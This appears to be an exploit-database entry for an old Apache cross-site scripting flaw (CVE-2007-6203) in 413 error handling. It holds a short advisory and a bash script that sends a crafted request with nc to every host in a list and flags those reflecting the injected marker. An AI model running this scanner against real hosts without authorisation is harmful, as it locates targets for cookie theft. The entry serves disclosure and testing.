Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting

Author: Adrian Pastor
type: remote
platform: unix
port: 
date_added: 2007-11-30  
date_updated: 2014-01-10  
verified: 1  
codes: CVE-2007-6203;OSVDB-39003  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30835.sh  

source: https://www.securityfocus.com/bid/26663/info

Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected.

#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
       echo "$0 <hosts-file>"
       exit
fi

for i in `cat $1`
do

if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
-i '<PROCHECKUP>' > /dev/null
then
       echo "$i is VULNERABLE!"
fi

done